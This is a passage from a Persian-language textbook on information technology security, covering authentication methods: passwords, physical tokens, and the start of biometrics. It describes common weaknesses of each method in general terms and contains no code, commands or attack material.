‫ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﺗﻔﻜﻴﻚ ﻣﻲﻛﻨﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﻛﺜـﺮ‬
‫ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺑﺎﻳﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ ﭼﺎﭖ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺗﻨﻬـﺎ‬
‫ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺍﺛﺒﺎﺕ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﺟﻠﻮﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﺸﺴﺘﻪ ﻛﺎﺭﺑﺮ ﻣﺠـﺎﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺧـﺎﺹ ﺍﺳـﺖ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﻪ ﻛـﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺑـﺎ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻧﺴﺒﻲ ﻳﺎ ﺍﺣﺮﺍﺯ ﺗﺪﺍﻭﻡ ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺑﺮﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻤﻞ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﻣـﺸﻜﻞ ﺍﺳـﺖ‪.‬‬
‫ﻻ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺩﺭﻋﻮﺽ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺴﺒﻲ ﺯﻳﺎﺩﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪ .‬ﺍﻓﺮﺍﺩ ﺑﺎﺗﺠﺮﺑﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ "ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ"‪" ،‬ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ"‪ ،‬ﻭ ﻳﺎ "ﺁﻧﭽﻪ ﻛﻪ ﻫﺴﺘﻴﺪ" ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺨـﺸﻬﺎﻱ ﺑﻌـﺪﻱ ﺍﻳـﻦ‬
‫ﺳﻪ ﺭﻭﺵ ﺳﻨﺘﻲ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺩﺭ ﻛﻨﺎﺭ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪﺗﺮ‪" :‬ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ"‪.‬‬
‫ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ‪ :‬ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ‬
‫ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻫﻢ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﻳﻚ ﺷﻨﺎﺳـﺔ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؛ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺗﺎﻳﭗ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﺎﻳﭗﺷﺪﻩ ﺑـﺎ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤﺨﻮﺍﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓﺮﺽ ﺑﺮ ﺁﻥ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻓﺮﺩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﭼﻮﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﻫﻴﭻ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻫﻤﭽﻨـﺎﻥ ﭘـﺮ ﺍﺳـﺘﻔﺎﺩﻩﺗـﺮﻳﻦ‬
‫ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺟﻬﺎﻥ ﺍﻣﺮﻭﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺭﻭﺍﺝ ﺯﻳﺎﺩ‪ ،‬ﺍﻛﺜﺮ ﻣـﺎ ﺍﻛﻨـﻮﻥ ﺩﻫﻬـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺩﺍﺭﻳﻢ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻪﺭﻭﺯﻩ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳﺎﺩ ﺑﻴﺎﻭﺭﻳﻢ؛ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ )‪PIN‬ﻫﺎ(‪ ١٢٦،‬ﺭﻣﺰﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫‪ ،ATM‬ﻛﺎﺭﺗﻬﺎﻱ ﺗﻤﺎﺱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﭘﺎﺳـﺨﮕﻮ‪ ،‬ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ ﺗﻠﻔﻨﻬـﺎﻱ ﺳـﻴﺎﺭ‪ ،‬ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ‪ ،‬ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻠﻔﻨﻲ‪ ،‬ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ‪.‬‬
‫ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﮐﻪ ﺩﺭ ﺻﻔﺤﺔ ﻣﻘﺎﺑﻞ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬
‫•‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺩﺭ ﺍﻭﻟـﻴﻦ ﻭﺭﻭﺩ‬
‫ﻻ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ﻭ ﻧﻴـﺰ ﻣﻤﻜـﻦ‬
‫ﻛﺎﺭﺑﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﺩﻫﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ‪ ،‬ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﻧﺒﺎﺷﺪ‪.‬‬
‫•‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳﺪﻩ ﺷﻮﻧﺪ‪ .‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﻳـﻦ‬
‫ﺧﻄﺮ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﺷﺨﺼﻲ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﻭﺍﺭﺩ ﻛﻨﺪ ﻭ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺑـﺎﻻﻱ‬
‫ﺷﺎﻧﺔ ﺍﻭ ﺁﻧﺮﺍ ﺑﺒﻴﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﻴﭻ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻱﺳﺎﺯﻱ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺁﻥ ﻓﺮﺩ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺍﺯ ﺣﺎﻟﺖ ﺭﻣﺰ ﺩﺭ ﺑﻴـﺎﻭﺭﺩ ﻭﺟـﻮﺩ‬
‫ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ!‬
‫‪126 Personal Identification Numbers‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣١٥‬‬
‫•‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﺣﺘﻲ ﻓﺮﺍﻣﻮﺵ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩﺗﺮﻱ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺎﻣﻨﺎﺳﺐ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ‬
‫ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ‪.‬‬
‫•‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﻮﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﻧﺒﺎﻳـﺪ‪،‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﻧﺸﺎﻥﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‪ :١٢٧‬ﭼﻴﺰﻱ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‬
‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺁﻥ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺛﺒﺎﺕ ﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺍﺳﺖ ‪ -‬ﺍﺷﻴﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺁﻧﻬﺎ ﺑﻪ‬
‫ﻧﻮﻋﻲ ﻫﻮﻳﺖ ﺭﺍ ﺍﺛﺒﺎﺕ ﻣﻲﻛﻨﺪ‪ .‬ﻛﻠﻴﺪ ﺩﺭﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺑﺮﺍﻱ ﻗﺮﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ؛ ﺩﺭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ‪ ،‬ﻛﻠﻴﺪﻫﺎﻱ ﻓﻠﺰﻱ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﺎ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻓﺮﻛـﺎﻧﺲ ﺭﺍﺩﻳـﻮﻳﻲ ﺗﻜﻤﻴـﻞ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺗﻲ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻓﻠﺰﻱ ﺍﺭﺟﺤﻴﺖ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﻮﻥ ﻫﺮ ﻛﺎﺭﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﻤﺎﺭﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑـﻪ‬
‫ﻳﻚ ﻫﻮﻳﺖ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳﻴﺴﺘﻢ ﺩﺭ ﻋﻤﻞ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻛﺎﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺗﺎ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺩﺭﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺭﺍ ﺑـﺎﺯ‬
‫ﻼ ﻛﺎﺭﺕ ﻳﻚ ﻣﻨﺸﻲ ﺳﻄﺢ ﭘﺎﺋﻴﻦ ﻧﺘﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺩﺭ‬
‫ﻛﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻣﺜ ﹰ‬
‫ﺳﺎﻋﺎﺕ ﻏﻴﺮ ﺍﺩﺍﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﺧﻂﻣﺸﻲ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ‪ :‬ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺧـﻮﺩ ﺑـﻪ‬
‫ﻛﺎﺭﺗﻬﺎﻳﺸﺎﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﻪ ﺳﺮﻋﺖ ﻛﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﮔﻢ ﺷﺪﻩ ﻳﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧـﺪ ﺭﺍ ﮔـﺰﺍﺭﺵ ﻣـﻲﺩﻫﻨـﺪ؛ ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﻛـﺎﺭﺕ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻻ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﺴﺎﺩﮔﻲ ﻳﻚ ﻛﺎﺭﺕ ﺟﺪﻳﺪ ﺑﻪ ﺩﺍﺭﻧﺪﻩ ﺁﻥ ﺗﻌﻠﻖ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺑﻬﺒﻮﺩ ﺑـﺮﺍﻱ‬
‫"ﮔﻤﺸﺪﻩ" ﺩﺭ ﺳﻴﺴﺘﻢ ﺛﺒﺖ ﺷﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺧﻮﺩ‪ ،‬ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻣﺸﻜﻼﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫• ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺛﺎﺑﺖ ﻧﻤﻲﻛﻨﻨﺪ ﻛﻪ ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ .‬ﻫﺮ ﻛﺲ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻣﺎﻟﻜﻴﺖ ﻧﺸﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ؛‬
‫• ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺸﺎﻥ ﺭﺍ ﮔﻢ ﻛﻨﺪ ﺩﻳﮕﺮ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺣﺘﻲ ﺍﮔﺮ ﻫﻮﻳﺖ ﻭﻱ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ؛ ﻭ‬
‫• ﺑﻌﻀﻲ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﺟﻌﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ‪ :‬ﺁﻧﭽﻪ ﻛﻪ ﺷﻤﺎ ﻫﺴﺘﻴﺪ‬
‫ﺳﻮﻣﻴﻦ ﺗﻜﻨﻴﻚ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﺭﻓﺘﻪﺭﻓﺘﻪ ﺭﻭﺍﺝ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨـﺪ ﺗﻬﻴـﺔ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﻼ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﺷﺪﻩ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻚ‪ ،‬ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ )ﺑﻴﻮﻣﺘﺮﻳﻚ(‪ ١٢٨‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪،‬‬
‫ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺨﺺ ﻭ ﻣﻘﺎﻳﺴﻪ ﺁﻥ ﺑﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ‬
‫‪127 Physical Tokens‬‬
‫‪128 Biometric‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺍﻓﺮﺍﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﻧﺸﺎﻧﻬﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﻻ ﺳﻴـﺴﺘﻢ ﻧـﺸﺎﻧﻬﺎ ﺑـﺎ‬
‫ﺑﻮﻳﮋﻩ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺸﺎﻥ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ ﻣﺸﻜﻞﺳﺎﺯ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻳﻤـﻦ ﻣﻌﻤـﻮ ﹰ‬
